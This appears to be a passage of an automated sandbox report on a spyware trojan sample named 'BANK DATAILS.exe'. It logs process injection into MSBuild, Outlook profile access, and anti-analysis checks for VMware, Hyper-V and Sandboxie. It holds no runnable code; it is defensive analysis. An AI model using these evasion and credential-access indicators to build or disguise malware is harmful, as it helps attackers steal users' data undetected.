                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0159F3C86_2_0159F3C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_015961206_2_01596120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061EB7306_2_061EB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061EC4806_2_061EC480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061E1FF86_2_061E1FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061E00406_2_061E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06824EB06_2_06824EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068266C86_2_068266C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682C7B06_2_0682C7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682EBB06_2_0682EBB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682E0206_2_0682E020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068232A86_2_068232A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06821D286_2_06821D28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_069B40406_2_069B4040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_069B1CD86_2_069B1CD8
                Source: BANK DATAILS.exe, 00000000.00000000.241417077.0000000000598000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerQooZu.exe: vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoluxvACLLYUDPsbdXzoAMGZzttgGVPry.exe4 vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.296493208.0000000002EDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.290109071.00000000029C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.290109071.00000000029C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoluxvACLLYUDPsbdXzoAMGZzttgGVPry.exe4 vs BANK DATAILS.exe
                Source: BANK DATAILS.exe, 00000000.00000002.304934354.00000000072E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BANK DATAILS.exe
                Source: BANK DATAILS.exeBinary or memory string: OriginalFilenamerQooZu.exe: vs BANK DATAILS.exe
                Source: BANK DATAILS.exeVirustotal: Detection: 54%
                Source: BANK DATAILS.exeReversingLabs: Detection: 35%
                Source: BANK DATAILS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\BANK DATAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\BANK DATAILS.exe "C:\Users\user\Desktop\BANK DATAILS.exe"
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\BANK DATAILS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK DATAILS.exe.logJump to behavior
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@7/1@1/2
                Source: BANK DATAILS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\BANK DATAILS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 6.0.MSBuild.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 6.0.MSBuild.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: BANK DATAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BANK DATAILS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F40015 push esp; retf 0_2_00F40016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061E9770 push es; ret 6_2_061EA770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061E3139 push es; iretd 6_2_061E313C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_061EF1C8 push esp; ret 6_2_061EF1C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068232A8 push es; iretd 6_2_068240B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682178F push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682179B push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068217EB push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06821753 push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068218AF push es; ret 6_2_06821910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068218B3 push es; ret 6_2_06821910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068240B1 push es; iretd 6_2_06824148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06821CCA push 10061CCFh; retf 6_2_06821CD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06821817 push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0682181B push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06821867 push es; ret 6_2_068218C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_068241D9 push es; iretd 6_2_068241E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_06824149 push es; iretd 6_2_068241D8
                Source: initial sampleStatic PE information: section name: .text entropy: 6.9916083972247
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTR
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\BANK DATAILS.exe TID: 5416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5924Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5960Thread sleep count: 9701 > 30Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9701Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: MSBuild.exe, 00000006.00000002.522911178.00000000064DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000003.326970071.00000000064CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj[[$
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: BANK DATAILS.exe, 00000000.00000002.292195714.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_069B5488 LdrInitializeThunk,6_2_069B5488
                Source: C:\Users\user\Desktop\BANK DATAILS.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Users\user\Desktop\BANK DATAILS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
